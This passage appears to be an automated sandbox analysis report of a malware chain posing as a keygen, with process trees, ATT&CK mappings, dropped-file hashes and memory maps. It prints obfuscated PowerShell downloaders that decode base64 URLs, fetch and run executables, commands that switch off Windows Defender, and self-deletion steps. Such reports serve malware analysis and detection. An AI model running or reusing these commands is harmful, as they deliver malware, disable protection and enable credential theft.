$edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:200
                • C:\Users\Public\pfn.exe
                  "C:\Users\Public\pfn.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4212
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                    6⤵
                      PID:1840
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4908
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                          8⤵
                            PID:4640
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              9⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4100
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                10⤵
                                • Executes dropped EXE
                                PID:4672
                          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                            8⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:908
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 908 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\194220737351800\\* & exit
                              9⤵
                                PID:2440
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /pid 908
                                  10⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4220
                        • C:\Users\Public\pfn.exe
                          "C:\Users\Public\pfn.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:2136
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F77.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3792
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3004
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 2
                    3⤵
                    • Delays execution with timeout.exe
                    PID:644
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F77.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4428
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4488
                      • C:\Users\Public\auv.exe
                        "C:\Users\Public\auv.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:4664
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:812
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:5104
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 5104 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\491259161366128\\* & exit
                              8⤵
                                PID:1564
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /pid 5104
                                  9⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4492
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:4920
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:3632
                          • C:\Users\Public\auv.exe
                            "C:\Users\Public\auv.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:5032
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F77.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4532
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4644
                • C:\Windows\SysWOW64\DllHost.exe
                  C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  1⤵
                    PID:1876
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c start C:\Windows\temp\4n2vurdd.exe
                      2⤵
                        PID:4296
                        • C:\Windows\temp\4n2vurdd.exe
                          C:\Windows\temp\4n2vurdd.exe
                          3⤵
                          • Executes dropped EXE
                          PID:4964
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "powershell" Get-MpPreference -verbose
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3672
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4680
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4504
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2120
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4724
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                            4⤵
                              PID:4128
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                              4⤵
                                PID:4540
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                4⤵
                                  PID:4612
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                  4⤵
                                    PID:2640
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /IM cmstp.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4292

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Persistence

                            Modify Existing Service

                            1
                            T1031

                            Defense Evasion

                            Modify Registry

                            2
                            T1112

                            Disabling Security Tools

                            2
                            T1089

                            Credential Access

                            Credentials in Files

                            3
                            T1081

                            Discovery

                            Query Registry

                            2
                            T1012

                            System Information Discovery

                            2
                            T1082

                            Collection

                            Data from Local System

                            3
                            T1005

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\ProgramData\freebl3.dll
                            • C:\ProgramData\mozglue.dll
                            • C:\ProgramData\mozglue.dll
                            • C:\ProgramData\msvcp140.dll
                            • C:\ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • C:\ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • C:\ProgramData\softokn3.dll
                            • C:\ProgramData\sqlite3.dll
                            • C:\ProgramData\sqlite3.dll
                            • C:\ProgramData\vcruntime140.dll
                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                            • C:\Users\Admin\AppData\Local\Temp\DfhuSreOaZ.exe
                            • C:\Users\Admin\AppData\Local\Temp\DfhuSreOaZ.exe
                            • C:\Users\Admin\AppData\Local\Temp\F77.tmp\Keygen.exe
                            • C:\Users\Admin\AppData\Local\Temp\F77.tmp\Keygen.exe
                            • C:\Users\Admin\AppData\Local\Temp\F77.tmp\b.hta
                            • C:\Users\Admin\AppData\Local\Temp\F77.tmp\b1.hta
                            • C:\Users\Admin\AppData\Local\Temp\F77.tmp\ba.hta
                            • C:\Users\Admin\AppData\Local\Temp\F77.tmp\ba1.hta
                            • C:\Users\Admin\AppData\Local\Temp\F77.tmp\m.hta
                            • C:\Users\Admin\AppData\Local\Temp\F77.tmp\m1.hta
                            • C:\Users\Admin\AppData\Local\Temp\F77.tmp\start.bat
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\QgZMT6EdWQ.exe
                              MD5

                              013db621a3351e3fb049efd2ccad79ff

                              SHA1

                              a23394ea54dbc5342a77938a2c285ee616185560

                              SHA256

                              df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                              SHA512

                              1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                            • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\fcchyP6nPF.exe
                            • C:\Users\Admin\AppData\Local\Temp\fcchyP6nPF.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\iXXxRGbJmt.exe
                            • C:\Users\Admin\AppData\Local\Temp\iXXxRGbJmt.exe
                            • C:\Users\Public\auv.exe
                            • C:\Users\Public\auv.exe
                            • C:\Users\Public\auv.exe
                            • C:\Users\Public\esi.exe
                            • C:\Users\Public\esi.exe
                            • C:\Users\Public\esi.exe
                            • C:\Users\Public\pfn.exe
                            • C:\Users\Public\pfn.exe
                            • C:\Users\Public\pfn.exe
                            • C:\Windows\Temp\4n2vurdd.exe
                              MD5

                              f4b5c1ebf4966256f52c4c4ceae87fb1

                              SHA1

                              ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                              SHA256

                              88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                              SHA512

                              02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                            • C:\Windows\temp\4n2vurdd.exe
                              MD5

                              f4b5c1ebf4966256f52c4c4ceae87fb1

                              SHA1

                              ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                              SHA256

                              88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                              SHA512

                              02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                            • C:\Windows\temp\ucbgpkcg.inf
                            • \ProgramData\mozglue.dll
                            • \ProgramData\mozglue.dll
                            • \ProgramData\mozglue.dll
                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • \ProgramData\sqlite3.dll
                            • \ProgramData\sqlite3.dll
                            • \ProgramData\sqlite3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                              MD5

                              02cc7b8ee30056d5912de54f1bdfc219

                              SHA1

                              a6923da95705fb81e368ae48f93d28522ef552fb

                              SHA256

                              1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                              SHA512

                              0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                            • \Users\Admin\AppData\LocalLow\sqlite3.dll
                            • memory/200-59-0x0000000007FB0000-0x0000000007FB1000-memory.dmp
                              Filesize

                              4KB

                            • memory/200-79-0x0000000009750000-0x0000000009751000-memory.dmp
                              Filesize

                              4KB

                            • memory/200-27-0x00000000701F0000-0x00000000708DE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/200-25-0x0000000000000000-mapping.dmp
                            • memory/200-82-0x0000000008D00000-0x0000000008D01000-memory.dmp
                              Filesize

                              4KB

                            • memory/352-0-0x0000000000000000-mapping.dmp
                            • memory/396-7-0x0000000000000000-mapping.dmp
                            • memory/644-24-0x0000000000000000-mapping.dmp
                            • memory/748-146-0x0000000000400000-0x0000000000439000-memory.dmp
                              Filesize

                              228KB

                            • memory/748-150-0x0000000000417A8B-mapping.dmp
                            • memory/748-155-0x0000000000400000-0x0000000000439000-memory.dmp
                              Filesize

                              228KB

                            • memory/812-156-0x0000000000000000-mapping.dmp
                            • memory/908-237-0x0000000000417A8B-mapping.dmp
                            • memory/908-236-0x0000000000400000-0x0000000000434000-memory.dmp
                              Filesize

                              208KB

                            • memory/908-239-0x0000000000400000-0x0000000000434000-memory.dmp
                              Filesize

                              208KB

                            • memory/996-304-0x0000000004D50000-0x0000000004D51000-memory.dmp
                              Filesize

                              4KB

                            • memory/996-307-0x0000000004E50000-0x0000000004E51000-memory.dmp
                              Filesize

                              4KB

                            • memory/996-300-0x0000000000000000-mapping.dmp
                            • memory/1564-209-0x0000000000000000-mapping.dmp
                            • memory/1644-9-0x0000000000000000-mapping.dmp
                            • memory/1664-2-0x0000000000000000-mapping.dmp
                            • memory/1664-3-0x0000000000000000-mapping.dmp
                            • memory/1724-10-0x0000000000000000-mapping.dmp
                            • memory/1840-211-0x0000000000000000-mapping.dmp
                            • memory/2104-277-0x0000000000000000-mapping.dmp
                            • memory/2120-361-0x00007FF92B630000-0x00007FF92C01C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/2120-352-0x0000000000000000-mapping.dmp
                            • memory/2136-214-0x0000000000400000-0x0000000000493000-memory.dmp
                              Filesize

                              588KB

                            • memory/2136-217-0x0000000000400000-0x0000000000493000-memory.dmp
                              Filesize

                              588KB

                            • memory/2136-215-0x000000000043FCC3-mapping.dmp
                            • memory/2440-258-0x0000000000000000-mapping.dmp
                            • memory/2640-367-0x0000000000000000-mapping.dmp
                            • memory/2696-309-0x0000000005130000-0x0000000005133000-memory.dmp
                              Filesize

                              12KB

                            • memory/2696-292-0x0000000000850000-0x0000000000851000-memory.dmp
                              Filesize

                              4KB

                            • memory/2696-284-0x0000000000000000-mapping.dmp
                            • memory/2696-303-0x0000000002A10000-0x0000000002A21000-memory.dmp
                              Filesize

                              68KB

                            • memory/2696-289-0x0000000071FD0000-0x00000000726BE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/2696-294-0x0000000001240000-0x0000000001241000-memory.dmp
                              Filesize

                              4KB

                            • memory/2704-31-0x0000000006BD0000-0x0000000006BD1000-memory.dmp
                              Filesize

                              4KB

                            • memory/2704-103-0x0000000009FA0000-0x0000000009FA1000-memory.dmp
                              Filesize

                              4KB

                            • memory/2704-18-0x0000000000CF0000-0x0000000000CF1000-memory.dmp
                              Filesize

                              4KB

                            • memory/2704-21-0x0000000006CD0000-0x0000000006CD1000-memory.dmp
                              Filesize

                              4KB

                            • memory/2704-35-0x0000000007300000-0x0000000007301000-memory.dmp
                              Filesize

                              4KB

                            • memory/2704-37-0x0000000007370000-0x0000000007371000-memory.dmp
                              Filesize

                              4KB

                            • memory/2704-14-0x00000000701F0000-0x00000000708DE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/2704-40-0x0000000007520000-0x0000000007521000-memory.dmp
                              Filesize

                              4KB

                            • memory/2704-53-0x0000000007E70000-0x0000000007E71000-memory.dmp
                              Filesize

                              4KB

                            • memory/2704-12-0x0000000000000000-mapping.dmp
                            • memory/2704-99-0x0000000009120000-0x0000000009121000-memory.dmp
                              Filesize

                              4KB

                            • memory/2704-101-0x0000000007D60000-0x0000000007D61000-memory.dmp
                              Filesize

                              4KB

                            • memory/2764-210-0x0000000000000000-mapping.dmp
                            • memory/2780-15-0x00000000701F0000-0x00000000708DE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/2780-13-0x0000000000000000-mapping.dmp
                            • memory/2780-49-0x0000000006C80000-0x0000000006C81000-memory.dmp
                              Filesize

                              4KB

                            • memory/2964-295-0x0000000000000000-mapping.dmp
                            • memory/3004-26-0x0000000000000000-mapping.dmp
                            • memory/3004-30-0x00000000701F0000-0x00000000708DE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/3100-154-0x0000000000400000-0x0000000000425000-memory.dmp
                              Filesize

                              148KB

                            • memory/3100-151-0x000000000041A684-mapping.dmp
                            • memory/3100-149-0x0000000000400000-0x0000000000425000-memory.dmp
                              Filesize

                              148KB

                            • memory/3420-145-0x000000000043FCC3-mapping.dmp
                            • memory/3420-148-0x0000000000400000-0x0000000000498000-memory.dmp
                              Filesize

                              608KB

                            • memory/3420-143-0x0000000000400000-0x0000000000498000-memory.dmp
                              Filesize

                              608KB

                            • memory/3632-172-0x000000000041A684-mapping.dmp
                            • memory/3672-333-0x00007FF92B630000-0x00007FF92C01C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/3672-331-0x0000000000000000-mapping.dmp
